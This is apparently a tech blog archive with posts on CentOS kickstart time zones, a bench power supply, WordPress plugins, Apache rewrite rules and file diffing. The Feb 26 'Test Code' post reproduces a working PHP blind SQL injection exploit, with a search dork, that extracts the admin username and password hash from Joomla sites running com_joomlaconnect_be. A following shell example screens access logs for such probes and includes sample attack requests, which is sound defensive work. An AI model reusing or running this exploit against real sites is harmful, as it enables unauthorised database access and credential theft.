Feb 28

Hello again fair readers !  Today’s quick tip concerns the problem with missing time zones when deploying CentOS 5.3 (and some of the more recent Fedoras) in a kickstart environment.  It’s a known problem, and unfortunately, since the source of the problem (an incomplete time zone data file) lies deep in the heart of the kickstart environment, fixing it directly is a distinct pain in the buttock region.

There is, however, a workaround – and it’s not even that messy !  The first step is to use a region that does exist, such as « Europe/Paris », which will satisfy the installer – then set the time zone to what you actually want after the fact in the « %post » section.  So, in the top section of the kickstart file, we’ll put :

# set temporarily to avoid time zone bug during install
timezone --utc Europe/Paris

The « --utc » switch simply states that the system clock is in UTC, which is pretty standard these days, but ultimately optional.  Next, in the %post section towards the end, we’ll shoehorn our little hack fix into place :

# fix faulty time zone setting
mv /etc/sysconfig/clock /etc/sysconfig/clock.BAD
sed 's@^ZONE="Europe/Paris"@ZONE="Etc/UTC"@' /etc/sysconfig/clock.BAD > /etc/sysconfig/clock
/usr/sbin/tzdata-update

So, what’s going on there ?  Let’s break it down :

  • In the first line, we’re just backing up the original configuration file, to use in the next line…
  • The second line is the important one – this is the actual manipulation which will fix the faulty time zone, setting it to whatever we want.  In this example « Etc/UTC » is used, but you can pick whatever is appropriate.
    • The tool being used here is « sed », a non-interactive editor which dates back to the 1970’s, and which is still used by system administrators around the world every day.
    • The command we’re issuing to sed is between the single quotes – astute readers will notice that it’s a regular expression, but with @’s instead of the more usual /’s.  In it, we simply state that the instance of « ZONE="Europe/Paris" » is to be replaced with « ZONE="Etc/UTC" ».
    • This change is to be made against the backup file, and outputted to the actual config.
  • Finally, we run « tzdata-update » which, as you’ve no doubt guessed, updates the time zone data system-wide, based (in part) on the newly-corrected clock config.

And that, as they say, is that.  Happy kickstarting, friends, and I’ll see you next time !

Feb 27

I’ve always had an interest in electronics and recently I’ve been exploring my interests more. Last week I sorted through my tub of parts and placed them in individual drawers. It took a good while to sort everything but I think it was worth it. I’ve seen power supplies built from PC power supplies before so I thought I’d build one myself. Thing is, I never really got around to it.

Yesterday I was feeling rather ambitious and decided to make a bench top power supply for small electronics. All the sites I found I have lost, so I kind of made it up as I went along. Most of them used ATX power supplies that are readily available, but I opted for the easy way out and used an AT with a hard on/off switch. At first this was the only reason I used it, but there are more advantages to using an AT over an ATX power supply for an external power supply. Firstly, it was cheap, well free actually. I took it from a PC that I had modified some time ago. I have a box full of AT power supplies in storage that I’ll get to some time and replace it. But I won’t be using the PC it came out of for a while, mostly because I have toaster ovens that are faster. Another reason it is better than an ATX is it has fewer voltages. The only voltages listed are 12v, 5v, -5v (7v) and GND. They vary in amps but are sufficient for what I will be using it for. It made it easy not to screw it up since there weren’t many wires.

Making it was really easy. I took the top off. Drilled 4 holes in the case and inserted the insulated terminals, checking to make sure they didn’t ground out on the case. Cut most of the cables, leaving a couple of Molex connectors hanging out just in case I need them. I then soldered the remaining wires to a terminal by voltage (Yellow +12, Red +5, Red +/-5, Black GND.) It might not be the prettiest of them all, but I think it will do its job well.

Feb 26

Test Code


#!/usr/bin/php
  <?php 

ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

if ($argc > 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

$t = abs((100-($w/$r*100))); 

echo "Username: "; 

for ($i=1; $i <= 30; $i++) { 

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); 

   if (abs((100-($laenge/$r*100))) > $t-1) { 

      $count = $i; 

      $i = 30; 

   } 

} 

for ($j = 1; $j < $count; $j++) { 

   for ($i = 46; $i <= 122; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 122; 

      } 

   } 

} 

echo "\nPassword: "; 

for ($j = 1; $j <= 49; $j++) { 

   for ($i = 46; $i <= 102; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 102; 

      } 

   } 

} 

} 

?>
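A defender's view of the script above, as an added example that is not part of the original post: every probe it sends puts SQL text into the `id` parameter of `com_joomlaconnect_be`, so a server's access log can be screened for clients whose `id` values are not plain integers. The function names, the Apache combined log format, the threshold and the sample log lines are assumptions made for this example.

```shell
#!/bin/sh
# Constructed access-log lines (Apache combined format). The client addresses
# are documentation ranges; nothing here comes from a real server.
sample_log() {
cat <<'EOF'
192.0.2.10 - - [26/Feb/2010:10:00:01 +0000] "GET /index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [26/Feb/2010:10:00:09 +0000] "GET /index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=12 HTTP/1.1" 200 4871 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Feb/2010:10:01:00 +0000] "GET /index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3+and+1=1-- HTTP/1.0" 200 5120 "-" "-"
198.51.100.7 - - [26/Feb/2010:10:01:00 +0000] "GET /index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3+and+1=0-- HTTP/1.0" 200 2210 "-" "-"
198.51.100.7 - - [26/Feb/2010:10:01:01 +0000] "GET /index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3+and+ascii(substring((select+username+from+jos_users+limit+0,1),1,1))%3E46-- HTTP/1.0" 200 5120 "-" "-"
198.51.100.7 - - [26/Feb/2010:10:01:01 +0000] "GET /index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3+and+ascii(substring((select+username+from+jos_users+limit+0,1),1,1))%3E48-- HTTP/1.0" 200 2210 "-" "-"
203.0.113.5 - - [26/Feb/2010:10:02:30 +0000] "GET /index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3%27 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.0.2.10 - - [26/Feb/2010:10:03:00 +0000] "GET /index.php?option=com_content&id=about-us HTTP/1.1" 200 900 "-" "Mozilla/5.0"
EOF
}

# Read log lines on stdin and print "client count" for every client that sent
# at least $1 (default 3) requests to the component with a non-integer id.
flag_non_numeric_id() {
    awk -v min="${1:-3}" '
    {
        target = $7                 # request target in the combined log format
        # Only this component is screened; other components may use text ids.
        if (index(tolower(target), "option=com_joomlaconnect_be") == 0) next
        n = split(substr(target, index(target, "?") + 1), params, "&")
        for (i = 1; i <= n; i++) {
            if (substr(params[i], 1, 3) != "id=") continue
            # A legitimate id is digits only; anything else counts as a hit.
            if (substr(params[i], 4) !~ /^[0-9]+$/) bad[$1]++
        }
    }
    END { for (ip in bad) if (bad[ip] >= min) print ip, bad[ip] }
    ' | sort
}

# Demo on the constructed log: only the probing client reaches the threshold.
sample_log | flag_non_numeric_id 3
```

The screen only finds the traffic; the fix belongs in the component, which has to treat `id` as an integer before it reaches the query.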
Feb 25

If you use WordPress as a CMS for your clients’ websites, you’ve probably faced this issue: regular people find WordPress hard to use. Yes, it is quite user-friendly, but apparently not enough for people who double-click on links when browsing or, worse, enter their website’s URL in Google to get there. To make it easier for these people to maintain their own website, I would suggest the following tips.

1. Install an extended version of TinyMCE

This is one of the first things I realize that the person who will maintain the website is not internet-savvy. To avoid the annoying “Where is the blablabla button?” question, just install this WordPress plugin and you’ll save some precious time when teaching how to use the WordPress admin. The TinyMCE Advanced plugin gives you a settings page where you can add many buttons to the visual editor.

2. Add rich text to your widgets

Do you know what happens the first time your client tries to add an image in a sidebar widget? He calls you, usually when you have something much more important to finish. Luckily, someone created this nifty little WordPress plugin to add rich-text widgets in your admin.

3. Make pages management easier

Managing pages is a little too abstract in regular WordPress for most clients. Again, there is a nice WordPress plugin that simplifies the page management task by using a wonderful drag and drop interface.

4. Give them better control over the navigation


This is not necessary for smaller sites with simple navigation, but it will be for websites using several navigations mixing categories and pages. With the WordPress Navigation List Plugin, your client takes full control over their navigation with an easy-to-use interface.

5. Give them limited permissions

Your clients will never use some functionalities in WordPress, so why should they even access them? Installing the Adminimize plugin will let you decide what your client can access, thus limiting the potential mistakes and decluttering the admin.

6. Simplify the WordPress admin’s interface

Honestly this isn’t a huge improvement, but the Admin Trim Interface plugin will help your client to find his way faster by decluttering the interface.

7. Give them advanced control over the contact forms

Creating or modifying forms is quite a complicated task for the regular internet user. To let your client work on his website’s forms, I would suggest one of these two plugins:

  • cforms II: the one I use on Designer Daily, it has a simple form admin area but can be a little annoying to upgrade (no auto upgrade).
  • Contact Form 7: a plugin I used on several clients’ websites, easy to install and configure.

8. Let them access stats from within the WordPress admin


Why would you do that? Simply because some clients are not too familiar with handling multiple accounts for web services, this will then make their life easier by giving them all the info they need in one place. For that I’d suggest these two plugins:

9. Use Windows Live Writer to write blog posts.

Overview

Feb 25

SEO Smart Links provides automatic SEO benefits for your site in addition to custom keyword lists, nofollow and much more.

SEO Smart Links can automatically link keywords and phrases in your posts and comments with corresponding posts, pages, categories and tags on your blog.

Furthermore, SEO Smart Links allows you to set up your own keywords and sets of matching URLs. Finally, SEO Smart Links allows you to set the nofollow attribute and open links in a new window.

It is a perfect solution to get your blog posts interlinked or add affiliate links to other sites.

Everything happens completely transparently, and you can edit the options from the administration settings panel.

The smart link plugin for WordPress lets you insert links using natural language rather than urls.

Without:

<a href="http://example.com">
  Example
</a>

With:

[Example->]

The resulting increase in usability is quite significant.

A Few Words On Autolink Plugins…

… since this was the initial idea behind smart links.

There are several autolink plugins around. aLinks is one of the better ones, if this is what you’d like to be using. They invariably suffer from one or two niggles:

  1. They’re too systematic: If your keyword shows 10 times in a text, it’ll get linked 10 times.
  2. There are times when it makes more sense to add a keyword link on an entire key phrase, and autolink plugins don’t allow this.

Smart links’ flexibility lets you work around both niggles.

Default Usage

The Basics

Using smart links, you insert links using an arrow in between brackets (the same syntax as the one used on several established newspaper websites):

[link text->link]

For instance, if you’re linking to a page called "dog training tips", you could end up writing:

[teach your puppy to sit->dog training tips]

The syntax is permissive: It’s case insensitive and impervious to extra spaces.

If your link text is the same as the link, you can simply close the bracket after the arrow:

[dog training tips->]

For reference, the syntax also works with normal urls and emails:

[goitworld->http://www.goitworld.com]
[Mickey->mickey@mouse.com]

Also for reference, "slugs" (the sanitized versions of titles that show in the url) work too:

[teach your puppy to sit->dog-training-tips]

These basics in mind, let’s hop to how they can become useful for SEO and site maintainability purposes.

How Smart Links Come In Handy

Smart links are useful in that they let you pre-insert links in your site.

The links get silenced when no relevant piece of information is found. They then mutate as the site evolves, in order to point to the most worthy piece of information at all time.

Suppose that you’re starting a dog training blog.

During the first week, you add a few posts and add smart links to "dog training tips". You know you’ll eventually write about this explicitly, so you might as well add the links as you create the posts.

Shortly after, you spend some time adding a bunch of bookmarks in the link manager. One of them is called "Dog Training Tips". The smart links, which were silenced until now (they were returning the text with no link), now point to the bookmark you’ve just entered.

You update the bookmark (you change its URL to a better site you’ve just found) the next day, and the site updates without your even worrying about it.

Eventually, you write a post titled "Dog Training Tips" — and add a smart link to "Dog Training Tips" in it. The old posts are now pointing to this post instead, and the smart link in this post is pointing to your bookmark.

A week later, you write a new post called "Dog Training Tips". The smart links are now all pointing to this new post — because it is more recent than the first one.

At last, you create a section — a static page — called "Dog Training Tips", with a smart link to "Dog Training Tips" in it. All of the smart links are now pointing to this static page. The only exception is the "Dog Training Tips" smart link on that page, which is pointing to your bookmark.

If, upon revisiting your site a year later, you decide to turn the "Dog Training Tips" section into a subsection of "Dog Training", smart links will update themselves and point to the static page’s new url.

In other words:

  1. Smart Links seek to return a link to the bookmark with the same name.
  2. When posts with the same title exist, Smart Links will point to the most recent post instead.
  3. When a static page with the same title exists, Smart Links will point to that static page instead.
  4. On the post or static page that is supposed to get linked to, smart links will try to fall back to a bookmark (there’s no point in linking a web page to itself).
  5. When all else fails, Smart Links return the link text with no link.

Got it all so far? Onto smart link domains.

Advanced Usage

Smart Link Domains

Domains are areas that smart links scan for relevant pieces of information. By default, smart links look all over the place. But you can restrict smart links to certain domains, by using the following syntax:

[link text->link @ domain]

Implicit links work here as well:

[roll over->@ dog tricks]

Built-in domains include those related to WordPress:

  • posts
  • pages
  • entries (posts and pages)
  • links
  • wp (all of the above = the default domain)

For instance, you could write:

[teach your puppy to sit->dog training tips @ pages]

The above smart link would get silenced until you create a dog training tips page.

Other built-in domains include:

  • google
  • yahoo
  • msn
  • wiki

These create outbound links to the search queries on google, yahoo, msn, and wikipedia respectively.

The last set of built-in domains is dynamic. They let you restrict smart links to a section on your site.

Smart Links understands sections as static pages with no parents. When you use a section domain, only links to static pages within that section will be returned.

On semiologic.com, for instance:

  • [services->@services] would point to the services section
  • [services->@members] would point to a services page of the members’ area

These dynamic domains become tremendously useful when you start having multiple static pages with the same name on your site. Or when you wish to fine-tune where the smart links are pointing.

Text-Rendering Engine Transparency

The smart link syntax is transparent to Markdown and Textile syntax, but will not allow html code within smart links.

Class Attribute

If you want to add a class="external" attribute to outbound smart links, you need to use the external links plugin.

Title Attribute

Smart links use the page title, post title, category name, and link name as relevant.

Smart Link And Comments

Smart links are disabled in comments, to prevent spammers from bypassing anti-spam plugins.

Escaping Smart Links

You can escape the smart link by putting it in between backticks (`), e.g.:

  • `[escape the link->]` outputs:

    [escape the link->]

The backticks will be "used up" when the smart links are processed.

Smart Link Greediness

The smart link syntax is not greedy, e.g.:

  • [test1 [test2->/] ->/] outputs:

    [test1 test2 ->/]

Smart Link Plugins

If you feel like coding, you can register new smart link domains, like this:

smart_links::register_engine($domain, $callback);

The expected signature of domain handling callback functions is the following:

domain_engine($link) returns $links
  • $links is an array($look_for => $found)
  • $look_for is the reference that is looked for
  • $found is of course initialized to false

Download

This package is part of WordPress Plugin, and is access-restricted.

Smart Links v.4.2.2 (Jan 5th, 2010)

Requires WP 2.8. Tested up to 2.9.1.

Bleeding Edge Zip

Smart Links (Bleeding) v.4.2.2 (Jan 5th, 2010)

Requires WP 2.8. Tested up to 2.9.1.

Feb 24

This relates to Fedora 10 and ISPConfig 3.0.1 set up as described in this HowtoForge post. One of my colleagues recently got interested in offering our clients WordPress as a content management system, so he’s been trying it out. Yesterday he found out that if he wanted to change the permalink style in WordPress he needed write access to .htaccess, which he didn’t have because the user rights haven’t been set up very well there. So I gave him write access by using

chown daemon:daemon .htaccess

Unfortunately this resulted in a 500 Internal Server Error. Looking at the error log for the website I tried this on, I saw that RewriteEngine directives were not allowed in the .htaccess. Since I didn’t want to mess with the base configurations of ISPConfig I started looking around for other options. Eventually I found that I had to add something similar to this to the Apache directives field under options under the website’s settings

<IfModule mod_rewrite.c>
  <Directory /var/www/[sitename]/web/>
    Options +FollowSymLinks
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
  </Directory>
</IfModule>

Of course [sitename] should be replaced with the name of your website. It all worked after I restarted the Apache server myself, but I do not know if that is completely necessary. Also it might take a few seconds before ISPConfig finishes editing the configuration file.

Feb 22

I had an issue this week where I needed to remove lines from one file if they existed in another file. Looking back it was frustrating as such a task should be simple.

I tried all sorts of things. Differencing the two files and using grep to grab the lines I wanted. Whatever I tried just did not produce the expected results. Thanks to a buddy I found the solution which ended up being to sort the two files before using diff.

Example:
Assuming two files exist, File_1 and File_2. File_1 contains lines with a, b, c and d. File_2 contains b and d. If we want to remove b and d from File_1 because they exist in File_2 you could use something like this:

owen@goit:~$ cat File_1.txt
a
b
c
d
owen@goit:~$ cat File_2.txt
b
d

owen@goit:~$ diff File_1.txt File_2.txt | grep \< | cut -d \  -f 2
a
c

That’s all fine and dandy until File_2.txt contains the same lines in a different order. Running the same command produces different results. See below:

owen@goit:~$ cat File_2.txt
d
b

owen@goit:~$ diff File_1.txt File_2.txt | grep \< | cut -d \  -f 2
a
b
c

The solution, as noted above, is to use sort beforehand and then difference them:

owen@goit:~$ sort File_1.txt >> File_1-sorted; sort File_2.txt >> File_2-sorted;
owen@goit:~$ diff File_1-sorted File_2-sorted | grep \< | cut -d \  -f 2
a
c

Obviously the example has been simplified, when dealing with thousands of lines the sort could take a while. With that said I’m sure there are more efficient ways to achieve the same results. I wouldn’t doubt there being a command better suited to do this. Have at it in the comments.
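For the order-independent removal the post asks about, one option (an added example, not from the original post) is `grep -Fvxf`, which needs no sorting, with `comm -23` on sorted copies as the alternative. The function names and the sample file contents are assumptions made for this example; both functions compare whole lines, so lines that contain spaces come through intact.

```shell
#!/bin/sh
# Print the lines of file $1 that do not occur as whole lines in file $2.
# Neither file has to be sorted and the output keeps the order of $1.
remove_listed_lines() {
    # An empty list removes nothing; handled here so grep never sees an empty -f file.
    [ -s "$2" ] || { cat -- "$1"; return; }
    # -F: fixed strings, not regexes   -x: match the whole line
    # -v: keep the non-matching lines  -f: read the patterns from file $2
    grep -Fvxf "$2" -- "$1" || [ $? -eq 1 ]   # status 1 only means "nothing left"
}

# Same set of lines through comm: both inputs are sorted first, so the output
# is sorted and de-duplicated instead of keeping the order of $1.
remove_listed_lines_sorted() {
    tmp=$(mktemp -d) || return 1
    LC_ALL=C sort -u -- "$1" > "$tmp/a"
    LC_ALL=C sort -u -- "$2" > "$tmp/b"
    LC_ALL=C comm -23 "$tmp/a" "$tmp/b"   # -23: only lines unique to the first file
    rm -rf "$tmp"
}

# Constructed sample input: File_1 has a line with a space, File_2 is unsorted.
demo_dir=$(mktemp -d)
printf 'a\nb\nc c\nd\n' > "$demo_dir/File_1.txt"
printf 'd\nb\n'         > "$demo_dir/File_2.txt"
remove_listed_lines        "$demo_dir/File_1.txt" "$demo_dir/File_2.txt"
remove_listed_lines_sorted "$demo_dir/File_1.txt" "$demo_dir/File_2.txt"
rm -rf "$demo_dir"
```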

Feb 22

Many of our readers are asking what KeepAliveTimeout setting should be used in the Apache config. We usually select 2 to 5 seconds, as it provides the best performance for sites with a medium number of visitors, and prefer to use Nginx or any other front-end proxy to better manage thousands of concurrent users.
